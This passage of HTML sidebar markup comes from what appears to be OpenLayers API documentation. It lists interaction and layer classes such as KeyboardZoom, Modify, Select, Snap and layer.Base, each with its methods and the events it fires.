<li data-name="ol.interaction.KeyboardPan#getProperties" class="">
<a href="ol.interaction.KeyboardPan.html#getProperties">getProperties</a>
</li>
<li data-name="ol.interaction.KeyboardPan#getRevision" class="unstable">
<a href="ol.interaction.KeyboardPan.html#getRevision">getRevision</a>
</li>
<li data-name="ol.interaction.KeyboardPan#on" class="">
<a href="ol.interaction.KeyboardPan.html#on">on</a>
</li>
<li data-name="ol.interaction.KeyboardPan#once" class="">
<a href="ol.interaction.KeyboardPan.html#once">once</a>
</li>
<li data-name="ol.interaction.KeyboardPan#set" class="">
<a href="ol.interaction.KeyboardPan.html#set">set</a>
</li>
<li data-name="ol.interaction.KeyboardPan#setActive" class="unstable">
<a href="ol.interaction.KeyboardPan.html#setActive">setActive</a>
</li>
<li data-name="ol.interaction.KeyboardPan#setProperties" class="">
<a href="ol.interaction.KeyboardPan.html#setProperties">setProperties</a>
</li>
<li data-name="ol.interaction.KeyboardPan#un" class="">
<a href="ol.interaction.KeyboardPan.html#un">un</a>
</li>
<li data-name="ol.interaction.KeyboardPan#unByKey" class="">
<a href="ol.interaction.KeyboardPan.html#unByKey">unByKey</a>
</li>
<li data-name="ol.interaction.KeyboardPan#unset" class="">
<a href="ol.interaction.KeyboardPan.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:change:active" class="unstable">
change:active
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.interaction.KeyboardZoom">
<span class="title">
<a href="ol.interaction.KeyboardZoom.html">ol.interaction.KeyboardZoom</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.interaction.KeyboardZoom.handleEvent" class="unstable">
<a href="ol.interaction.KeyboardZoom.html#handleEvent">handleEvent</a>
</li>
<li data-name="ol.interaction.KeyboardZoom#changed" class="unstable">
<a href="ol.interaction.KeyboardZoom.html#changed">changed</a>
</li>
<li data-name="ol.interaction.KeyboardZoom#get" class="">
<a href="ol.interaction.KeyboardZoom.html#get">get</a>
</li>
<li data-name="ol.interaction.KeyboardZoom#getActive" class="unstable">
<a href="ol.interaction.KeyboardZoom.html#getActive">getActive</a>
</li>
<li data-name="ol.interaction.KeyboardZoom#getKeys" class="">
<a href="ol.interaction.KeyboardZoom.html#getKeys">getKeys</a>
</li>
<li data-name="ol.interaction.KeyboardZoom#getProperties" class="">
<a href="ol.interaction.KeyboardZoom.html#getProperties">getProperties</a>
</li>
<li data-name="ol.interaction.KeyboardZoom#getRevision" class="unstable">
<a href="ol.interaction.KeyboardZoom.html#getRevision">getRevision</a>
</li>
<li data-name="ol.interaction.KeyboardZoom#on" class="">
<a href="ol.interaction.KeyboardZoom.html#on">on</a>
</li>
<li data-name="ol.interaction.KeyboardZoom#once" class="">
<a href="ol.interaction.KeyboardZoom.html#once">once</a>
</li>
<li data-name="ol.interaction.KeyboardZoom#set" class="">
<a href="ol.interaction.KeyboardZoom.html#set">set</a>
</li>
<li data-name="ol.interaction.KeyboardZoom#setActive" class="unstable">
<a href="ol.interaction.KeyboardZoom.html#setActive">setActive</a>
</li>
<li data-name="ol.interaction.KeyboardZoom#setProperties" class="">
<a href="ol.interaction.KeyboardZoom.html#setProperties">setProperties</a>
</li>
<li data-name="ol.interaction.KeyboardZoom#un" class="">
<a href="ol.interaction.KeyboardZoom.html#un">un</a>
</li>
<li data-name="ol.interaction.KeyboardZoom#unByKey" class="">
<a href="ol.interaction.KeyboardZoom.html#unByKey">unByKey</a>
</li>
<li data-name="ol.interaction.KeyboardZoom#unset" class="">
<a href="ol.interaction.KeyboardZoom.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:change:active" class="unstable">
change:active
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.interaction.Modify">
<span class="title">
<a href="ol.interaction.Modify.html">ol.interaction.Modify</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.interaction.Modify.handleEvent" class="unstable">
<a href="ol.interaction.Modify.html#handleEvent">handleEvent</a>
</li>
<li data-name="ol.interaction.Modify#changed" class="unstable">
<a href="ol.interaction.Modify.html#changed">changed</a>
</li>
<li data-name="ol.interaction.Modify#get" class="">
<a href="ol.interaction.Modify.html#get">get</a>
</li>
<li data-name="ol.interaction.Modify#getActive" class="unstable">
<a href="ol.interaction.Modify.html#getActive">getActive</a>
</li>
<li data-name="ol.interaction.Modify#getKeys" class="">
<a href="ol.interaction.Modify.html#getKeys">getKeys</a>
</li>
<li data-name="ol.interaction.Modify#getProperties" class="">
<a href="ol.interaction.Modify.html#getProperties">getProperties</a>
</li>
<li data-name="ol.interaction.Modify#getRevision" class="unstable">
<a href="ol.interaction.Modify.html#getRevision">getRevision</a>
</li>
<li data-name="ol.interaction.Modify#on" class="">
<a href="ol.interaction.Modify.html#on">on</a>
</li>
<li data-name="ol.interaction.Modify#once" class="">
<a href="ol.interaction.Modify.html#once">once</a>
</li>
<li data-name="ol.interaction.Modify#set" class="">
<a href="ol.interaction.Modify.html#set">set</a>
</li>
<li data-name="ol.interaction.Modify#setActive" class="unstable">
<a href="ol.interaction.Modify.html#setActive">setActive</a>
</li>
<li data-name="ol.interaction.Modify#setProperties" class="">
<a href="ol.interaction.Modify.html#setProperties">setProperties</a>
</li>
<li data-name="ol.interaction.Modify#un" class="">
<a href="ol.interaction.Modify.html#un">un</a>
</li>
<li data-name="ol.interaction.Modify#unByKey" class="">
<a href="ol.interaction.Modify.html#unByKey">unByKey</a>
</li>
<li data-name="ol.interaction.Modify#unset" class="">
<a href="ol.interaction.Modify.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:change:active" class="unstable">
change:active
</li>
<li data-name="ol.ModifyEvent#event:modifyend" class="unstable">
<a href="ol.ModifyEvent.html#event:modifyend">modifyend</a>
</li>
<li data-name="ol.ModifyEvent#event:modifystart" class="unstable">
<a href="ol.ModifyEvent.html#event:modifystart">modifystart</a>
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.interaction.MouseWheelZoom">
<span class="title">
<a href="ol.interaction.MouseWheelZoom.html">ol.interaction.MouseWheelZoom</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.interaction.MouseWheelZoom.handleEvent" class="unstable">
<a href="ol.interaction.MouseWheelZoom.html#handleEvent">handleEvent</a>
</li>
<li data-name="ol.interaction.MouseWheelZoom#changed" class="unstable">
<a href="ol.interaction.MouseWheelZoom.html#changed">changed</a>
</li>
<li data-name="ol.interaction.MouseWheelZoom#get" class="">
<a href="ol.interaction.MouseWheelZoom.html#get">get</a>
</li>
<li data-name="ol.interaction.MouseWheelZoom#getActive" class="unstable">
<a href="ol.interaction.MouseWheelZoom.html#getActive">getActive</a>
</li>
<li data-name="ol.interaction.MouseWheelZoom#getKeys" class="">
<a href="ol.interaction.MouseWheelZoom.html#getKeys">getKeys</a>
</li>
<li data-name="ol.interaction.MouseWheelZoom#getProperties" class="">
<a href="ol.interaction.MouseWheelZoom.html#getProperties">getProperties</a>
</li>
<li data-name="ol.interaction.MouseWheelZoom#getRevision" class="unstable">
<a href="ol.interaction.MouseWheelZoom.html#getRevision">getRevision</a>
</li>
<li data-name="ol.interaction.MouseWheelZoom#on" class="">
<a href="ol.interaction.MouseWheelZoom.html#on">on</a>
</li>
<li data-name="ol.interaction.MouseWheelZoom#once" class="">
<a href="ol.interaction.MouseWheelZoom.html#once">once</a>
</li>
<li data-name="ol.interaction.MouseWheelZoom#set" class="">
<a href="ol.interaction.MouseWheelZoom.html#set">set</a>
</li>
<li data-name="ol.interaction.MouseWheelZoom#setActive" class="unstable">
<a href="ol.interaction.MouseWheelZoom.html#setActive">setActive</a>
</li>
<li data-name="ol.interaction.MouseWheelZoom#setProperties" class="">
<a href="ol.interaction.MouseWheelZoom.html#setProperties">setProperties</a>
</li>
<li data-name="ol.interaction.MouseWheelZoom#un" class="">
<a href="ol.interaction.MouseWheelZoom.html#un">un</a>
</li>
<li data-name="ol.interaction.MouseWheelZoom#unByKey" class="">
<a href="ol.interaction.MouseWheelZoom.html#unByKey">unByKey</a>
</li>
<li data-name="ol.interaction.MouseWheelZoom#unset" class="">
<a href="ol.interaction.MouseWheelZoom.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:change:active" class="unstable">
change:active
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.interaction.PinchRotate">
<span class="title">
<a href="ol.interaction.PinchRotate.html">ol.interaction.PinchRotate</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.interaction.PinchRotate#changed" class="unstable">
<a href="ol.interaction.PinchRotate.html#changed">changed</a>
</li>
<li data-name="ol.interaction.PinchRotate#get" class="">
<a href="ol.interaction.PinchRotate.html#get">get</a>
</li>
<li data-name="ol.interaction.PinchRotate#getActive" class="unstable">
<a href="ol.interaction.PinchRotate.html#getActive">getActive</a>
</li>
<li data-name="ol.interaction.PinchRotate#getKeys" class="">
<a href="ol.interaction.PinchRotate.html#getKeys">getKeys</a>
</li>
<li data-name="ol.interaction.PinchRotate#getProperties" class="">
<a href="ol.interaction.PinchRotate.html#getProperties">getProperties</a>
</li>
<li data-name="ol.interaction.PinchRotate#getRevision" class="unstable">
<a href="ol.interaction.PinchRotate.html#getRevision">getRevision</a>
</li>
<li data-name="ol.interaction.PinchRotate#on" class="">
<a href="ol.interaction.PinchRotate.html#on">on</a>
</li>
<li data-name="ol.interaction.PinchRotate#once" class="">
<a href="ol.interaction.PinchRotate.html#once">once</a>
</li>
<li data-name="ol.interaction.PinchRotate#set" class="">
<a href="ol.interaction.PinchRotate.html#set">set</a>
</li>
<li data-name="ol.interaction.PinchRotate#setActive" class="unstable">
<a href="ol.interaction.PinchRotate.html#setActive">setActive</a>
</li>
<li data-name="ol.interaction.PinchRotate#setProperties" class="">
<a href="ol.interaction.PinchRotate.html#setProperties">setProperties</a>
</li>
<li data-name="ol.interaction.PinchRotate#un" class="">
<a href="ol.interaction.PinchRotate.html#un">un</a>
</li>
<li data-name="ol.interaction.PinchRotate#unByKey" class="">
<a href="ol.interaction.PinchRotate.html#unByKey">unByKey</a>
</li>
<li data-name="ol.interaction.PinchRotate#unset" class="">
<a href="ol.interaction.PinchRotate.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:change:active" class="unstable">
change:active
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.interaction.PinchZoom">
<span class="title">
<a href="ol.interaction.PinchZoom.html">ol.interaction.PinchZoom</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.interaction.PinchZoom#changed" class="unstable">
<a href="ol.interaction.PinchZoom.html#changed">changed</a>
</li>
<li data-name="ol.interaction.PinchZoom#get" class="">
<a href="ol.interaction.PinchZoom.html#get">get</a>
</li>
<li data-name="ol.interaction.PinchZoom#getActive" class="unstable">
<a href="ol.interaction.PinchZoom.html#getActive">getActive</a>
</li>
<li data-name="ol.interaction.PinchZoom#getKeys" class="">
<a href="ol.interaction.PinchZoom.html#getKeys">getKeys</a>
</li>
<li data-name="ol.interaction.PinchZoom#getProperties" class="">
<a href="ol.interaction.PinchZoom.html#getProperties">getProperties</a>
</li>
<li data-name="ol.interaction.PinchZoom#getRevision" class="unstable">
<a href="ol.interaction.PinchZoom.html#getRevision">getRevision</a>
</li>
<li data-name="ol.interaction.PinchZoom#on" class="">
<a href="ol.interaction.PinchZoom.html#on">on</a>
</li>
<li data-name="ol.interaction.PinchZoom#once" class="">
<a href="ol.interaction.PinchZoom.html#once">once</a>
</li>
<li data-name="ol.interaction.PinchZoom#set" class="">
<a href="ol.interaction.PinchZoom.html#set">set</a>
</li>
<li data-name="ol.interaction.PinchZoom#setActive" class="unstable">
<a href="ol.interaction.PinchZoom.html#setActive">setActive</a>
</li>
<li data-name="ol.interaction.PinchZoom#setProperties" class="">
<a href="ol.interaction.PinchZoom.html#setProperties">setProperties</a>
</li>
<li data-name="ol.interaction.PinchZoom#un" class="">
<a href="ol.interaction.PinchZoom.html#un">un</a>
</li>
<li data-name="ol.interaction.PinchZoom#unByKey" class="">
<a href="ol.interaction.PinchZoom.html#unByKey">unByKey</a>
</li>
<li data-name="ol.interaction.PinchZoom#unset" class="">
<a href="ol.interaction.PinchZoom.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:change:active" class="unstable">
change:active
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.interaction.Pointer">
<span class="title">
<a href="ol.interaction.Pointer.html">ol.interaction.Pointer</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.interaction.Pointer.handleEvent" class="unstable">
<a href="ol.interaction.Pointer.html#handleEvent">handleEvent</a>
</li>
<li data-name="ol.interaction.Pointer#changed" class="unstable">
<a href="ol.interaction.Pointer.html#changed">changed</a>
</li>
<li data-name="ol.interaction.Pointer#get" class="">
<a href="ol.interaction.Pointer.html#get">get</a>
</li>
<li data-name="ol.interaction.Pointer#getActive" class="unstable">
<a href="ol.interaction.Pointer.html#getActive">getActive</a>
</li>
<li data-name="ol.interaction.Pointer#getKeys" class="">
<a href="ol.interaction.Pointer.html#getKeys">getKeys</a>
</li>
<li data-name="ol.interaction.Pointer#getProperties" class="">
<a href="ol.interaction.Pointer.html#getProperties">getProperties</a>
</li>
<li data-name="ol.interaction.Pointer#getRevision" class="unstable">
<a href="ol.interaction.Pointer.html#getRevision">getRevision</a>
</li>
<li data-name="ol.interaction.Pointer#on" class="">
<a href="ol.interaction.Pointer.html#on">on</a>
</li>
<li data-name="ol.interaction.Pointer#once" class="">
<a href="ol.interaction.Pointer.html#once">once</a>
</li>
<li data-name="ol.interaction.Pointer#set" class="">
<a href="ol.interaction.Pointer.html#set">set</a>
</li>
<li data-name="ol.interaction.Pointer#setActive" class="unstable">
<a href="ol.interaction.Pointer.html#setActive">setActive</a>
</li>
<li data-name="ol.interaction.Pointer#setProperties" class="">
<a href="ol.interaction.Pointer.html#setProperties">setProperties</a>
</li>
<li data-name="ol.interaction.Pointer#un" class="">
<a href="ol.interaction.Pointer.html#un">un</a>
</li>
<li data-name="ol.interaction.Pointer#unByKey" class="">
<a href="ol.interaction.Pointer.html#unByKey">unByKey</a>
</li>
<li data-name="ol.interaction.Pointer#unset" class="">
<a href="ol.interaction.Pointer.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:change:active" class="unstable">
change:active
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.interaction.Select">
<span class="title">
<a href="ol.interaction.Select.html">ol.interaction.Select</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.interaction.Select.handleEvent" class="unstable">
<a href="ol.interaction.Select.html#handleEvent">handleEvent</a>
</li>
<li data-name="ol.interaction.Select#changed" class="unstable">
<a href="ol.interaction.Select.html#changed">changed</a>
</li>
<li data-name="ol.interaction.Select#get" class="">
<a href="ol.interaction.Select.html#get">get</a>
</li>
<li data-name="ol.interaction.Select#getActive" class="unstable">
<a href="ol.interaction.Select.html#getActive">getActive</a>
</li>
<li data-name="ol.interaction.Select#getFeatures" class="">
<a href="ol.interaction.Select.html#getFeatures">getFeatures</a>
</li>
<li data-name="ol.interaction.Select#getKeys" class="">
<a href="ol.interaction.Select.html#getKeys">getKeys</a>
</li>
<li data-name="ol.interaction.Select#getProperties" class="">
<a href="ol.interaction.Select.html#getProperties">getProperties</a>
</li>
<li data-name="ol.interaction.Select#getRevision" class="unstable">
<a href="ol.interaction.Select.html#getRevision">getRevision</a>
</li>
<li data-name="ol.interaction.Select#on" class="">
<a href="ol.interaction.Select.html#on">on</a>
</li>
<li data-name="ol.interaction.Select#once" class="">
<a href="ol.interaction.Select.html#once">once</a>
</li>
<li data-name="ol.interaction.Select#set" class="">
<a href="ol.interaction.Select.html#set">set</a>
</li>
<li data-name="ol.interaction.Select#setActive" class="unstable">
<a href="ol.interaction.Select.html#setActive">setActive</a>
</li>
<li data-name="ol.interaction.Select#setMap" class="">
<a href="ol.interaction.Select.html#setMap">setMap</a>
</li>
<li data-name="ol.interaction.Select#setProperties" class="">
<a href="ol.interaction.Select.html#setProperties">setProperties</a>
</li>
<li data-name="ol.interaction.Select#un" class="">
<a href="ol.interaction.Select.html#un">un</a>
</li>
<li data-name="ol.interaction.Select#unByKey" class="">
<a href="ol.interaction.Select.html#unByKey">unByKey</a>
</li>
<li data-name="ol.interaction.Select#unset" class="">
<a href="ol.interaction.Select.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:change:active" class="unstable">
change:active
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
<li data-name="ol.SelectEvent#event:select" class="unstable">
<a href="ol.SelectEvent.html#event:select">select</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.interaction.Snap">
<span class="title">
<a href="ol.interaction.Snap.html">ol.interaction.Snap</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.interaction.Snap#addFeature" class="unstable">
<a href="ol.interaction.Snap.html#addFeature">addFeature</a>
</li>
<li data-name="ol.interaction.Snap#changed" class="unstable">
<a href="ol.interaction.Snap.html#changed">changed</a>
</li>
<li data-name="ol.interaction.Snap#get" class="">
<a href="ol.interaction.Snap.html#get">get</a>
</li>
<li data-name="ol.interaction.Snap#getActive" class="unstable">
<a href="ol.interaction.Snap.html#getActive">getActive</a>
</li>
<li data-name="ol.interaction.Snap#getKeys" class="">
<a href="ol.interaction.Snap.html#getKeys">getKeys</a>
</li>
<li data-name="ol.interaction.Snap#getProperties" class="">
<a href="ol.interaction.Snap.html#getProperties">getProperties</a>
</li>
<li data-name="ol.interaction.Snap#getRevision" class="unstable">
<a href="ol.interaction.Snap.html#getRevision">getRevision</a>
</li>
<li data-name="ol.interaction.Snap#on" class="">
<a href="ol.interaction.Snap.html#on">on</a>
</li>
<li data-name="ol.interaction.Snap#once" class="">
<a href="ol.interaction.Snap.html#once">once</a>
</li>
<li data-name="ol.interaction.Snap#removeFeature" class="unstable">
<a href="ol.interaction.Snap.html#removeFeature">removeFeature</a>
</li>
<li data-name="ol.interaction.Snap#set" class="">
<a href="ol.interaction.Snap.html#set">set</a>
</li>
<li data-name="ol.interaction.Snap#setActive" class="unstable">
<a href="ol.interaction.Snap.html#setActive">setActive</a>
</li>
<li data-name="ol.interaction.Snap#setProperties" class="">
<a href="ol.interaction.Snap.html#setProperties">setProperties</a>
</li>
<li data-name="ol.interaction.Snap#un" class="">
<a href="ol.interaction.Snap.html#un">un</a>
</li>
<li data-name="ol.interaction.Snap#unByKey" class="">
<a href="ol.interaction.Snap.html#unByKey">unByKey</a>
</li>
<li data-name="ol.interaction.Snap#unset" class="">
<a href="ol.interaction.Snap.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:change:active" class="unstable">
change:active
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.layer">
<span class="title">
<a href="ol.layer.html">ol.layer</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.layer.Base">
<span class="title">
<a href="ol.layer.Base.html">ol.layer.Base</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.layer.Base#changed" class="unstable">
<a href="ol.layer.Base.html#changed">changed</a>
</li>
<li data-name="ol.layer.Base#get" class="">
<a href="ol.layer.Base.html#get">get</a>
</li>
<li data-name="ol.layer.Base#getBrightness" class="unstable">
<a href="ol.layer.Base.html#getBrightness">getBrightness</a>
</li>
<li data-name="ol.layer.Base#getContrast" class="unstable">
<a href="ol.layer.Base.html#getContrast">getContrast</a>
</li>
<li data-name="ol.layer.Base#getExtent" class="">
<a href="ol.layer.Base.html#getExtent">getExtent</a>
</li>
<li data-name="ol.layer.Base#getHue" class="unstable">
<a href="ol.layer.Base.html#getHue">getHue</a>
</li>
<li data-name="ol.layer.Base#getKeys" class="">
<a href="ol.layer.Base.html#getKeys">getKeys</a>
</li>
<li data-name="ol.layer.Base#getMaxResolution" class="">
<a href="ol.layer.Base.html#getMaxResolution">getMaxResolution</a>
</li>
<li data-name="ol.layer.Base#getMinResolution" class="">
<a href="ol.layer.Base.html#getMinResolution">getMinResolution</a>
</li>
<li data-name="ol.layer.Base#getOpacity" class="">
<a href="ol.layer.Base.html#getOpacity">getOpacity</a>
</li>
<li data-name="ol.layer.Base#getProperties" class="">
<a href="ol.layer.Base.html#getProperties">getProperties</a>
</li>
<li data-name="ol.layer.Base#getRevision" class="unstable">
<a href="ol.layer.Base.html#getRevision">getRevision</a>
</li>
<li data-name="ol.layer.Base#getSaturation" class="unstable">
<a href="ol.layer.Base.html#getSaturation">getSaturation</a>
</li>
<li data-name="ol.layer.Base#getVisible" class="">
<a href="ol.layer.Base.html#getVisible">getVisible</a>
</li>
<li data-name="ol.layer.Base#on" class="">
<a href="ol.layer.Base.html#on">on</a>
</li>
<li data-name="ol.layer.Base#once" class="">
<a href="ol.layer.Base.html#once">once</a>
</li>
<li data-name="ol.layer.Base#set" class="">
<a href="ol.layer.Base.html#set">set</a>
</li>
<li data-name="ol.layer.Base#setBrightness" class="unstable">
<a href="ol.layer.Base.html#setBrightness">setBrightness</a>
</li>
<li data-name="ol.layer.Base#setContrast" class="unstable">
<a href="ol.layer.Base.html#setContrast">setContrast</a>
</li>
<li data-name="ol.layer.Base#setExtent" class="">
<a href="ol.layer.Base.html#setExtent">setExtent</a>
</li>
<li data-name="ol.layer.Base#setHue" class="unstable">
<a href="ol.layer.Base.html#setHue">setHue</a>
</li>
<li data-name="ol.layer.Base#setMaxResolution" class="">
<a href="ol.layer.Base.html#setMaxResolution">setMaxResolution</a>
</li>
<li data-name="ol.layer.Base#setMinResolution" class="">
<a href="ol.layer.Base.html#setMinResolution">setMinResolution</a>
</li>
<li data-name="ol.layer.Base#setOpacity" class="">
<a href="ol.layer.Base.html#setOpacity">setOpacity</a>
</li>
<li data-name="ol.layer.Base#setProperties" class="">
<a href="ol.layer.Base.html#setProperties">setProperties</a>
</li>
<li data-name="ol.layer.Base#setSaturation" class="unstable">
<a href="ol.layer.Base.html#setSaturation">setSaturation</a>
</li>
<li data-name="ol.layer.Base#setVisible" class="">
<a href="ol.layer.Base.html#setVisible">setVisible</a>
</li>
<li data-name="ol.layer.Base#un" class="">
<a href="ol.layer.Base.html#un">un</a>
</li>
<li data-name="ol.layer.Base#unByKey" class="">
<a href="ol.layer.Base.html#unByKey">unByKey</a>
</li>
<li data-name="ol.layer.Base#unset" class="">
<a href="ol.layer.Base.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:change:brightness" class="unstable">
change:brightness
</li>
<li data-name="ol.ObjectEvent#event:change:contrast" class="unstable">
change:contrast
</li>
<li data-name="ol.ObjectEvent#event:change:extent" class="unstable">
change:extent
</li>
<li data-name="ol.ObjectEvent#event:change:hue" class="unstable">
change:hue
</li>
<li data-name="ol.ObjectEvent#event:change:maxResolution" class="unstable">
change:maxResolution
</li>
<li data-name="ol.ObjectEvent#event:change:minResolution" class="unstable">
change:minResolution
</li>
<li data-name="ol.ObjectEvent#event:change:opacity" class="unstable">
change:opacity
</li>
<li data-name="ol.ObjectEvent#event:change:saturation" class="unstable">
change:saturation
</li>
<li data-name="ol.ObjectEvent#event:change:visible" class="unstable">
change:visible
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.layer.Group">
<span class="title">
<a href="ol.layer.Group.html">ol.layer.Group</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.layer.Group#changed" class="unstable">
<a href="ol.layer.Group.html#changed">changed</a>
</li>
<li data-name="ol.layer.Group#get" class="">
<a href="ol.layer.Group.html#get">get</a>
</li>
<li data-name="ol.layer.Group#getBrightness" class="unstable">
<a href="ol.layer.Group.html#getBrightness">getBrightness</a>
</li>
<li data-name="ol.layer.Group#getContrast" class="unstable">
<a href="ol.layer.Group.html#getContrast">getContrast</a>
</li>
<li data-name="ol.layer.Group#getExtent" class="">
<a href="ol.layer.Group.html#getExtent">getExtent</a>
</li>
<li data-name="ol.layer.Group#getHue" class="unstable">
<a href="ol.layer.Group.html#getHue">getHue</a>
</li>
<li data-name="ol.layer.Group#getKeys" class="">
<a href="ol.layer.Group.html#getKeys">getKeys</a>
</li>
<li data-name="ol.layer.Group#getLayers" class="">
<a href="ol.layer.Group.html#getLayers">getLayers</a>
</li>
<li data-name="ol.layer.Group#getMaxResolution" class="">
<a href="ol.layer.Group.html#getMaxResolution">getMaxResolution</a>
</li>
<li data-name="ol.layer.Group#getMinResolution" class="">
<a href="ol.layer.Group.html#getMinResolution">getMinResolution</a>
</li>
<li data-name="ol.layer.Group#getOpacity" class="">
<a href="ol.layer.Group.html#getOpacity">getOpacity</a>
</li>
<li data-name="ol.layer.Group#getProperties" class="">
<a href="ol.layer.Group.html#getProperties">getProperties</a>
</li>
<li data-name="ol.layer.Group#getRevision" class="unstable">
<a href="ol.layer.Group.html#getRevision">getRevision</a>
</li>
<li data-name="ol.layer.Group#getSaturation" class="unstable">
<a href="ol.layer.Group.html#getSaturation">getSaturation</a>
</li>
<li data-name="ol.layer.Group#getVisible" class="">
<a href="ol.layer.Group.html#getVisible">getVisible</a>
</li>
<li data-name="ol.layer.Group#on" class="">
<a href="ol.layer.Group.html#on">on</a>
</li>
<li data-name="ol.layer.Group#once" class="">
<a href="ol.layer.Group.html#once">once</a>
</li>
<li data-name="ol.layer.Group#set" class="">
<a href="ol.layer.Group.html#set">set</a>
</li>
<li data-name="ol.layer.Group#setBrightness" class="unstable">
<a href="ol.layer.Group.html#setBrightness">setBrightness</a>
</li>
<li data-name="ol.layer.Group#setContrast" class="unstable">
<a href="ol.layer.Group.html#setContrast">setContrast</a>
</li>
<li data-name="ol.layer.Group#setExtent" class="">
<a href="ol.layer.Group.html#setExtent">setExtent</a>
</li>
<li data-name="ol.layer.Group#setHue" class="unstable">
<a href="ol.layer.Group.html#setHue">setHue</a>
</li>
<li data-name="ol.layer.Group#setLayers" class="">
<a href="ol.layer.Group.html#setLayers">setLayers</a>
</li>
<li data-name="ol.layer.Group#setMaxResolution" class="">
<a href="ol.layer.Group.html#setMaxResolution">setMaxResolution</a>
</li>
<li data-name="ol.layer.Group#setMinResolution" class="">
<a href="ol.layer.Group.html#setMinResolution">setMinResolution</a>
</li>
<li data-name="ol.layer.Group#setOpacity" class="">
<a href="ol.layer.Group.html#setOpacity">setOpacity</a>
</li>
<li data-name="ol.layer.Group#setProperties" class="">
<a href="ol.layer.Group.html#setProperties">setProperties</a>
</li>
<li data-name="ol.layer.Group#setSaturation" class="unstable">
<a href="ol.layer.Group.html#setSaturation">setSaturation</a>
</li>
<li data-name="ol.layer.Group#setVisible" class="">
<a href="ol.layer.Group.html#setVisible">setVisible</a>
</li>
<li data-name="ol.layer.Group#un" class="">
<a href="ol.layer.Group.html#un">un</a>
</li>
<li data-name="ol.layer.Group#unByKey" class="">
<a href="ol.layer.Group.html#unByKey">unByKey</a>
</li>
<li data-name="ol.layer.Group#unset" class="">
